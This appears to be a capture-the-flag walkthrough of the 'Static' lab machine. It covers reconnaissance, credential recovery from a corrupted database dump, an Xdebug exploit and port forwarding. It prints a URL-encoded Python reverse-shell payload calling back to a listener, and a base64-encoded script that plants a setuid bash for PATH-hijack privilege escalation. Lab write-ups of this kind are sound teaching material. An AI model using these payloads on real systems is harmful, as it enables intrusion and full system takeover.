In this post, I would like to share a walkthrough of the Static Machine.


This room has been considered difficulty rated as a Hard machine

Information Gathering on Static Machine


Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 


From the result, we got a few ports open such as:

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 8.2p1
  • 80: gunicorn

Let’s access the website interface such as static.htb:8080/.ftp_uploads/


There are two files that we can see over here


When I try to open warning.txt


We will need to download and save the db.sql.gz onto our machine and try to look at what has stored inside the file


Sadly, the file has been corrupted just been mentioned on warning.txt


Let’s do some research on how to recover the file on the internet


The result of the research didn’t show anything useful for now. Let’s scroll down and hope that we can find any useful tools to use


We managed to find a tool called gzrecover on GitHub.

Gaining Privileges Access on Static machine


The tools can be downloaded over here


Once the gzrocover is fully installed, we can run it by using the command sudo ./gzrecover db.sql.gz


We managed to recover the file and let’s read the file that has been recovered


However, the file contains some encrypted code but it’s obvious that it shows some MySQL commands. After decrypting the file, you will find out that there are credentials saved there.

  • username=admin
  • password=admin

Trying to bypass 2FA authentication


We notice that static.htb:8080 has a directory such as /vpn/ from our nmap result.


I found out that login.php is running on /vpn/ directory which lead to a login page


Once you have entered the credentials on the login page, it will redirect to 2FA Enabled page that looks something such as shown above


We will need to bypass the 2FA Enabled by running the command above.


It will show an Internal IT Support portal where you need to generate any name so a new VPN will be downloaded on your machine

Downloading openvpn


From the vpn file, I notice there’s another subdomain such as vpn.static.htb been written there.


Let’s the vpn that we have downloaded previously


We should be re-route the OpenVPN’s IP to 172.20.0.0/24


We should be able to access the URL 172.20.0.10 which contains the info.php file stored over there.


Let’s start our NC listener on our machine


We should be starting the exploit by running python2 exploit.py


## I have renamed the python file to exploit.py ##


I have tried the command as above but nothing happen on my nc listener


It works on this payload though


After entering the reverse shell payload, you should access the website 172.20.0.10/info.php?XDEBUG_SESSION_START=phpstorm


Voila! As a result, we got the reverse shell connection back to us.


Finally, we should be able to read the user flag by typing “cat user.txt

Escalate to Root Privileges Access


However, we need to transfer ncat from your machine to the victim’s machine


We should execute the port forwarding by executing the command ssh -N -L <anyport>:192.168.254.3:80 -i id_rsa www-data@172.20.0.10


Next, we need to exploit it by using the command ./phuip-fpizdam http://local:<anyport>/index.php


Therefore, we need to execute the command below on your browser

localhost:<anyport>/index.php?a=/usr/bin/python3.6%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.254.2%22%2C4242))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fbash%22)%27%0A

Finally, we managed to get the reverse shell connection back to us


Let’s execute the following the command

echo 'IyEvYmluL2Jhc2gKL2Jpbi9jcCAvYmluL2Jhc2ggL3RtcC9iYXNoIC0tbm8tcHJlc2VydmU9YWxsCi9iaW4vY2hvd24gcm9vdDpyb290IC90bXAvYmFzaAovYmluL2NobW9kIDQ3NzcgL3RtcC9iYXNoCg==' | base64 -d > /tmp/readlink

After that, we should rename the readlink file into sed (it shouldn’t matter about the naming)


Once you have renamed the file, we need to execute the export PATH=/tmp:$PATH before we proceed with the next step


Once that has been done, we can now execute the following command:

  • /usr/bin/ersatool
  • create
  • x
  • enter
  • exit

At last, we should be able to see the bash file on the /tmp/ directory


Next step, we need to execute the bash -p command on /tmp/ directory


Finally, we should be able to read the root flag by running the “cat /root/root.txt” command